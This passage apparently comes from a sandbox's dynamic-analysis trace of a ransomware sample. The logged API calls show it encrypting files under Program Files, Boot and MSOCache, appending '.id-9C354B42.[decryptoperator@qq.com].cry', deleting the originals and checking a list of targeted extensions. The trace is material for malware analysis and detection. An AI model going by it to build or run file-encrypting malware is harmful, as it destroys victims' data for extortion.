lpString2=".GIF") returned -1 [0055.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0055.562] lstrlenW (lpString=".1cd") returned 4 [0055.562] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0055.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19582_.GIF") returned 63 [0055.562] lstrlenW (lpString=".jpg") returned 4 [0055.562] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0055.562] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=12982) returned 1 [0055.562] CloseHandle (hObject=0x230) returned 1 [0055.563] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf")) returned 0x20 [0055.563] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0055.563] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.563] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0055.563] GetLastError () returned 0x0 [0055.563] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x32b6, lpOverlapped=0x0) returned 1 [0055.594] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x32c0, lpOverlapped=0x0) returned 1 [0055.594] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.595] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.595] SetEndOfFile (hFile=0x194) returned 1 [0055.595] CloseHandle (hObject=0x194) returned 1 [0055.595] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.595] SetEndOfFile (hFile=0x230) returned 1 [0055.596] CloseHandle (hObject=0x230) returned 1 [0055.596] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.596] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19695_.wmf")) returned 1 [0055.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0055.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0055.596] lstrlenW (lpString=".doc") returned 4 [0055.596] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.596] lstrlenW (lpString=".docx") returned 5 [0055.596] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.596] lstrlenW (lpString=".pdf") returned 4 [0055.596] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.596] lstrlenW (lpString=".xls") returned 4 [0055.596] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.596] lstrlenW (lpString=".xlsx") returned 5 [0055.596] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.596] lstrlenW (lpString=".ppt") returned 4 [0055.596] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0055.597] lstrlenW (lpString=".zip") returned 4 [0055.597] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.597] lstrlenW (lpString=".rar") returned 4 [0055.597] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.597] lstrlenW (lpString=".bz2") returned 4 [0055.597] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.597] lstrlenW (lpString=".7z") returned 3 [0055.597] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0055.597] lstrlenW (lpString=".dbf") returned 4 [0055.597] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0055.597] lstrlenW (lpString=".1cd") returned 4 [0055.597] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.597] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19695_.WMF") returned 63 [0055.597] lstrlenW (lpString=".jpg") returned 4 [0055.597] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.597] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=9710) returned 1 [0055.597] CloseHandle (hObject=0x230) returned 1 [0055.597] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf")) returned 0x20 [0055.597] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0055.598] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.598] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0055.598] GetLastError () returned 0x0 [0055.598] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x25ee, lpOverlapped=0x0) returned 1 [0055.643] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x25f0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x25f0, lpOverlapped=0x0) returned 1 [0055.644] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.644] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.644] SetEndOfFile (hFile=0x194) returned 1 [0055.644] CloseHandle (hObject=0x194) returned 1 [0055.644] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.644] SetEndOfFile (hFile=0x230) returned 1 [0055.645] CloseHandle (hObject=0x230) returned 1 [0055.645] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.645] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd19827_.wmf")) returned 1 [0055.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0055.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0055.646] lstrlenW (lpString=".doc") returned 4 [0055.646] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.646] lstrlenW (lpString=".docx") returned 5 [0055.646] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.646] lstrlenW (lpString=".pdf") returned 4 [0055.646] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.646] lstrlenW (lpString=".xls") returned 4 [0055.646] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.646] lstrlenW (lpString=".xlsx") returned 5 [0055.646] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.646] lstrlenW (lpString=".ppt") returned 4 [0055.646] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0055.646] lstrlenW (lpString=".zip") returned 4 [0055.646] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.646] lstrlenW (lpString=".rar") returned 4 [0055.646] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.646] lstrlenW (lpString=".bz2") returned 4 [0055.646] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.646] lstrlenW (lpString=".7z") returned 3 [0055.646] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0055.646] lstrlenW (lpString=".dbf") returned 4 [0055.646] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0055.646] lstrlenW (lpString=".1cd") returned 4 [0055.646] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.646] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 63 [0055.646] lstrlenW (lpString=".jpg") returned 4 [0055.646] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.647] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=11058) returned 1 [0055.647] CloseHandle (hObject=0x230) returned 1 [0055.647] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf")) returned 0x20 [0055.647] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.647] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0055.647] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.647] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.647] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0055.647] GetLastError () returned 0x0 [0055.647] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x2b32, lpOverlapped=0x0) returned 1 [0055.685] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x2b40, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x2b40, lpOverlapped=0x0) returned 1 [0055.687] ReadFile (in: hFile=0x230, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.687] WriteFile (in: hFile=0x194, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.687] SetEndOfFile (hFile=0x194) returned 1 [0055.687] CloseHandle (hObject=0x194) returned 1 [0055.687] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.687] SetEndOfFile (hFile=0x230) returned 1 [0055.688] CloseHandle (hObject=0x230) returned 1 [0055.688] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.688] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf")) returned 1 [0055.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0055.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0055.690] lstrlenW (lpString=".doc") returned 4 [0055.690] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.690] lstrlenW (lpString=".docx") returned 5 [0055.690] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.690] lstrlenW (lpString=".pdf") returned 4 [0055.690] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.690] lstrlenW (lpString=".xls") returned 4 [0055.690] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.690] lstrlenW (lpString=".xlsx") returned 5 [0055.690] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.690] lstrlenW (lpString=".ppt") returned 4 [0055.690] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0055.690] lstrlenW (lpString=".zip") returned 4 [0055.690] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.690] lstrlenW (lpString=".rar") returned 4 [0055.690] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.690] lstrlenW (lpString=".bz2") returned 4 [0055.690] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.690] lstrlenW (lpString=".7z") returned 3 [0055.690] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0055.690] lstrlenW (lpString=".dbf") returned 4 [0055.690] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0055.690] lstrlenW (lpString=".1cd") returned 4 [0055.690] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.690] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63 [0055.690] lstrlenW (lpString=".jpg") returned 4 [0055.690] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 Thread: id = 17 os_tid = 0xa04 [0035.263] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x38c06b0 [0035.264] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x38d06b8 [0035.265] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6505a0 [0035.265] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x6) returned 0x653260 [0035.265] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6505b8 [0035.265] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x100000) returned 0x3d90020 [0035.265] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6505d0 [0035.265] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6505d0, Size=0x20) returned 0x67fd88 [0035.265] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x6505d0 [0035.265] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x6505d0, Size=0x20) returned 0x67fd60 [0035.265] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0035.265] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0035.265] Wow64DisableWow64FsRedirection (in: OldValue=0x329ff58 | out: OldValue=0x329ff58*=0x0) returned 1 [0035.265] lstrlenW (lpString="kernel32.dll") returned 12 [0035.266] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd88 | out: hHeap=0x600000) returned 1 [0035.266] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0035.266] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd60 | out: hHeap=0x600000) returned 1 [0035.266] Sleep (dwMilliseconds=0x64) [0035.505] lstrcmpiW (lpString1=".ttf", lpString2=".cry") returned 1 [0035.505] lstrlenW (lpString="wgl4_boot.ttf") returned 13 [0035.505] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0035.596] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=47452) returned 1 [0035.596] CloseHandle (hObject=0x198) returned 1 [0035.596] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0035.596] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.596] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.596] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.596] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.596] lstrlenW (lpString=".doc") returned 4 [0035.596] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.596] lstrlenW (lpString=".docx") returned 5 [0035.596] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.596] lstrlenW (lpString=".pdf") returned 4 [0035.596] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.596] lstrlenW (lpString=".xls") returned 4 [0035.596] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.596] lstrlenW (lpString=".xlsx") returned 5 [0035.596] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.596] lstrlenW (lpString=".ppt") returned 4 [0035.596] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.596] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.596] lstrlenW (lpString=".zip") returned 4 [0035.596] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.596] lstrlenW (lpString=".rar") returned 4 [0035.596] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.597] lstrlenW (lpString=".bz2") returned 4 [0035.597] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.597] lstrlenW (lpString=".7z") returned 3 [0035.597] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.597] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.597] lstrlenW (lpString=".dbf") returned 4 [0035.597] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.597] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.597] lstrlenW (lpString=".1cd") returned 4 [0035.597] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.597] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.597] lstrlenW (lpString=".jpg") returned 4 [0035.597] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.597] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.597] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.597] lstrlenW (lpString=".doc") returned 4 [0035.597] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.597] lstrlenW (lpString=".docx") returned 5 [0035.597] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.597] lstrlenW (lpString=".pdf") returned 4 [0035.597] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.597] lstrlenW (lpString=".xls") returned 4 [0035.597] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.597] lstrlenW (lpString=".xlsx") returned 5 [0035.597] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.597] lstrlenW (lpString=".ppt") returned 4 [0035.597] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.597] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.597] lstrlenW (lpString=".zip") returned 4 [0035.597] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.597] lstrlenW (lpString=".rar") returned 4 [0035.597] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.597] lstrlenW (lpString=".bz2") returned 4 [0035.597] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.597] lstrlenW (lpString=".7z") returned 3 [0035.597] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.597] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.597] lstrlenW (lpString=".dbf") returned 4 [0035.597] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.597] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.598] lstrlenW (lpString=".1cd") returned 4 [0035.598] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.598] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.598] lstrlenW (lpString=".jpg") returned 4 [0035.598] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.598] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0035.598] lstrlenW (lpString="ExcelMUI.msi") returned 12 [0035.598] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0035.598] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=2506240) returned 1 [0035.598] CloseHandle (hObject=0x198) returned 1 [0035.598] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi")) returned 0x2020 [0035.598] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.599] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" 